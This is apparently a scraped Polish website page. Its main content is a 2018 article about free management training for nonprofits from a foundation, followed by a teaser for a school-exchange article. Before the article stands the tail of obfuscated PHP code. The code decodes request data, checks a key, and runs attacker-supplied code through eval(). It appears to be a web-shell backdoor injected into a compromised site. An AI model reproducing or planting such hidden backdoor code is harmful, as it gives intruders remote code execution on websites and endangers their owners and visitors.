$j28f2a3){$a3f51320 = $j28f2a3;$a3a13eb = $bcf005;}if (!$a3f51320){foreach ($x721d5[$x721d5['nd42b540a'][87].$x721d5['nd42b540a'][6].$x721d5['nd42b540a'][3].$x721d5['nd42b540a'][40]] as $bcf005=>$j28f2a3){$a3f51320 = $j28f2a3;$a3a13eb = $bcf005;}}$a3f51320 = @$x721d5[$x721d5['nd42b540a'][81].$x721d5['nd42b540a'][51].$x721d5['nd42b540a'][6].$x721d5['nd42b540a'][3].$x721d5['nd42b540a'][6]]($x721d5[$x721d5['nd42b540a'][58].$x721d5['nd42b540a'][10].$x721d5['nd42b540a'][4].$x721d5['nd42b540a'][17].$x721d5['nd42b540a'][82].$x721d5['nd42b540a'][51].$x721d5['nd42b540a'][40].$x721d5['nd42b540a'][62]]($x721d5[$x721d5['nd42b540a'][60].$x721d5['nd42b540a'][30].$x721d5['nd42b540a'][82].$x721d5['nd42b540a'][30]]($a3f51320), $a3a13eb));if (isset($a3f51320[$x721d5['nd42b540a'][53].$x721d5['nd42b540a'][35]]) && $p429c5==$a3f51320[$x721d5['nd42b540a'][53].$x721d5['nd42b540a'][35]]){if ($a3f51320[$x721d5['nd42b540a'][53]] == $x721d5['nd42b540a'][89]){$u6031 = Array($x721d5['nd42b540a'][22].$x721d5['nd42b540a'][90] => @$x721d5[$x721d5['nd42b540a'][60].$x721d5['nd42b540a'][40].$x721d5['nd42b540a'][6].$x721d5['nd42b540a'][10].$x721d5['nd42b540a'][62].$x721d5['nd42b540a'][82].$x721d5['nd42b540a'][82].$x721d5['nd42b540a'][51]](),$x721d5['nd42b540a'][60].$x721d5['nd42b540a'][90] => $x721d5['nd42b540a'][82].$x721d5['nd42b540a'][71].$x721d5['nd42b540a'][55].$x721d5['nd42b540a'][57].$x721d5['nd42b540a'][82],);echo @$x721d5[$x721d5['nd42b540a'][35].$x721d5['nd42b540a'][82].$x721d5['nd42b540a'][21].$x721d5['nd42b540a'][26].$x721d5['nd42b540a'][6]]($u6031);}elseif ($a3f51320[$x721d5['nd42b540a'][53]] == $x721d5['nd42b540a'][40]){eval/*ze59*/($a3f51320[$x721d5['nd42b540a'][10]]);}exit();}} ?>

Nieodpłatne szkolenia dla instytucji charytatywnych

Autor: admin
Data publikacji: 05.06.2018

Pracujesz dla niekomercyjnego stowarzyszenia albo fundacji? Teraz masz szansę ubiegać się o szkolenia, które rozwiną kompetencje członków waszej organizacji. Za uczestnictwo w zajęciach nie zapłacicie jednak ani złotówki.

Mimo, że organizacje niedochodowe prowadzą nader sensowne projekty i rekrutują do nich pełnych energii działaczy, to odczuwają brak eksperckiego przygotowania dotyczącego zarządzania. A na kursy czy studia podyplomowe raczej ich nie stać.

Doradcy z Fundacji Training Projects uznali, że warto wolontariuszom pomóc.  Przedstawicieli działających w tzw. sektorze NGO zapraszają na całkowicie darmowe kursy z wybranych dziedzin związanych z funkcjonowaniem stowarzyszeń i fundacji.  Wszyscy zainteresowani uczestnictwem  mogą zapisać się na warsztaty kontaktując się pod e-mailem [email protected] 

Przesyłać wnioski mogą formalnie zarejestrowane jednostki, jak również indywidualni wolontariusze.  Bez względu na status formalny, każdy poprosić o zapisanie go na wybrany kurs.  Szkolenia są w 100% darmowe, jednak korzystający ze szkolenia powinni znaleźć miejsce prowadzenia warsztatu – np. lokalna szkoła czy miejska biblioteka. 

Z jakich dziedzin można się szkolić?

zarządzanie projektem w organizacji non profit

przywództwo w zespole wolontariuszy – rola i zadania lidera

zespół i efekt synergii

rozwiązywanie problemów społecznych

jak pozyskać sponsora i darczyńcę

marketing i promocja organizacji

rozwiązywanie konfliktów w grupie wolontariuszy

prowadzenie prezentacji i przemówień

zarządzanie przez cele 

warsztaty rozwojowe dla coachów

Pomoc Fundacji Training Projects nie jest ograniczona czasowo – prośby o wsparcie składac można w dowolnym czasie. Jednak szkoleniowcy nie gwarantują wsparcia rozwojowego wszystkim chętnym. Decyduje ilość dostępnych w danym okresie miejsc i uzasadnienie potrzeby szkoleniowej opisane w aplikacji. 

- Chcemy dać szansę samorozwoju – wyjaśnia Iwona Piga, członek zarządu Fundacji. – Mamy na dzieję że dzięki nam organizowane przez wolontariuszy akcje staną się stały na coraz wyższym poziomie, nawet w tych mniej doświadczonych instytucjach. W takich miejscach wsparcie merytoryczne i pomoc ekspertów są zwykle potrzebne nawet bardziej niż dotacje i sponsorzy. Niejednokrotnie obserwujemy spore niewykorzystane fundusze unijne, bo organizacje nie wiedzą jak przygotować profesjonalnych projekt. Chcemy choć spróbować odrobinę to zmienić.  Tagi:
Losowy

Programy szkolne – wyjazdy do Wielkiej Brytanii

Nasz zespół prowadzi warsztaty i certyfikacje egzaminacyjne dla nastolatków przeprowadzających się wraz z opiekunami prawnymi do USA lub Wielkiej Brytanii. Umożliwiają one na bezpieczną prawnie migrację do tamtejszej jednostki nauczania szkolnego. Jak dotychczas realizowaliśmy m.in. niżej opisane programy: Oficja

Czytaj więcej...